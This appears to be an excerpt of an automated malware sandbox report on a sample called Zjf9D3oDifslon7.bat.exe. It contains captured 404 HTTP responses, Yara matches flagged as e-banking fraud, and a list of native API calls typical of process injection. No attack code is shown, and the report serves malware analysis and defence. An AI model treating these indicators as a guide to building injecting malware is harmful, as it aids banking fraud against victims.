                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 10 Mar 2025 11:29:18 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 10 Mar 2025 11:29:21 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 10 Mar 2025 11:30:12 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: W/"afe-6014d9a456b59"
                Content-Encoding: br
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 10 Mar 2025 11:30:14 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: W/"afe-6014d9a456b59"
                Content-Encoding: br
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 10 Mar 2025 11:30:17 GMT
                Content-Type: text/html
                Transfer-Encoding: chunked
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: W/"afe-6014d9a456b59"
                Content-Encoding: br
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Server: nginx
                Date: Mon, 10 Mar 2025 11:30:19 GMT
                Content-Type: text/html
                Content-Length: 2814
                Connection: close
                Vary: Accept-Encoding
                Last-Modified: Tue, 25 Jul 2023 10:57:52 GMT
                ETag: "afe-6014d9a456b59"
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:25 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:28 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:30 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:33 GMT
                Server: Apache
                Content-Length: 315
                Connection: close
                Content-Type: text/html; charset=iso-8859-1
                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:39 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:41 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:44 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:46 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:52 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:54 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:30:57 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global traffic
                HTTP traffic detected: HTTP/1.1 404 Not Found
                Date: Mon, 10 Mar 2025 11:31:00 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Ascii: 1cf<!DOCTYPE html><html><head> <meta charset="utf-8"> <script src="/EntryPoint/lib/bluebird.min.js"></script> <script src="/EntryPoint/lib/tslib.js"></script> <script src="/EntryPoint/lib/main.js"></script> <script src="/EntryPoint/lib/moment.js"></script> <script src="/Plugin/LOGOSetting.js" charset="utf-8"></script> <script src="/EntryPoint/app_4054.js"></script></head><body> <div id="content"></div></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Mar 2025 11:31:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Mar 2025 11:32:02 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Mar 2025 11:32:04 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 65 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4d 8f 31 4f c3 30 10 85 f7 fc 8a a3 13 0c f8 d2 2a 03 83 65 09 9a 54 54 0a 25 02 67 60 74 f1 21 57 a4 71 b0 2f 44 fc 7b 9c 54 48 2c 27 bd bb ef 3d bd 93 57 e5 f3 56 bf 35 15 3c ea a7 1a 9a f6 a1 de 6f 61 75 8b b8 af f4 0e b1 d4 e5 e5 b2 11 39 62 75 58 a9 4c 3a 3e 77 4a 3a 32 36 09 3e 71 47 aa c8 0b 38 78 86 9d 1f 7b 2b f1 b2 cc 24 2e 90 3c 7a fb 33 fb d6 ea 1f 93 54 26 07 a5 1d 41 a0 af 91 22 93 85 f6 a5 86 c9 44 e8 13 f7 31 73 e0 7b 60 77 8a 10 29 7c 53 10 12 87 39 29 a4 61 ac 0d 14 a3 ba 1f cc bb 23 dc 88 42 14 6b b8 6e 8f 63 cf e3 0d bc 2e 06 30 0c d3 34 89 cf ce c4 28 98 cc 19 1a 1f 18 ee 72 89 7f 01 a9 e7 d2 30 75 9a 3f cb 7e 01 ea f2 fe f1 14 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e8M1O0*eTT%g`t!Wq/D{TH,'=WV5<oau9buXL:>wJ:26>qG8x{+$.<z3T&A"D1s{`w)|S9)a#Bknc.04(r0u?~0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 10 Mar 2025 11:32:07 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeData Raw: 31 31 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6b 6c 61 73 73 2e 74 65 61 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 114<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at www.klass.team Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 10 Mar 2025 11:32:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeETag: W/"67c990a0-582"X-Edge-Location: MonoData Raw: 35 38 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 69 65 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4d 75 73 65 6f 53 61 6e 73 22 2c 20 22 4f 70 65 6e 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 61 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 
2d 68 65 69 67 68 74 3a 20 39 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 70 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a

                E-Banking Fraud

                Source: Yara match | File source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 5.2.Zjf9D3oDifslon7.bat.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000005.00000002.1425567653.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3723926592.00000000032C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3723986742.0000000003310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000C.00000002.3721644285.0000000002B40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1513121982.00000000070B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.3726633182.0000000004BB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000B.00000002.3723823865.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000005.00000002.1427356722.0000000003160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_0042C623 NtClose,5_2_0042C623
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882B60 NtClose,LdrInitializeThunk,5_2_01882B60
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_01882DF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_01882C70
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_018835C0 NtCreateMutant,LdrInitializeThunk,5_2_018835C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01884340 NtSetContextThread,5_2_01884340
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01884650 NtSuspendThread,5_2_01884650
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882B80 NtQueryInformationFile,5_2_01882B80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882BA0 NtEnumerateValueKey,5_2_01882BA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882BE0 NtQueryValueKey,5_2_01882BE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882BF0 NtAllocateVirtualMemory,5_2_01882BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882AB0 NtWaitForSingleObject,5_2_01882AB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882AD0 NtReadFile,5_2_01882AD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882AF0 NtWriteFile,5_2_01882AF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882DB0 NtEnumerateKey,5_2_01882DB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882DD0 NtDelayExecution,5_2_01882DD0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882D00 NtSetInformationFile,5_2_01882D00
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882D10 NtMapViewOfSection,5_2_01882D10
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882D30 NtUnmapViewOfSection,5_2_01882D30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882CA0 NtQueryInformationToken,5_2_01882CA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882CC0 NtQueryVirtualMemory,5_2_01882CC0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882CF0 NtOpenProcess,5_2_01882CF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882C00 NtQueryInformationProcess,5_2_01882C00
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882C60 NtCreateKey,5_2_01882C60
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882F90 NtProtectVirtualMemory,5_2_01882F90
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882FA0 NtQuerySection,5_2_01882FA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882FB0 NtResumeThread,5_2_01882FB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882FE0 NtCreateFile,5_2_01882FE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882F30 NtCreateSection,5_2_01882F30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882F60 NtCreateProcessEx,5_2_01882F60
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882E80 NtReadVirtualMemory,5_2_01882E80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882EA0 NtAdjustPrivilegesToken,5_2_01882EA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882EE0 NtQueueApcThread,5_2_01882EE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exe | Code function: 5_2_01882E30 NtWriteVirtualMemory,5_2_01882E30
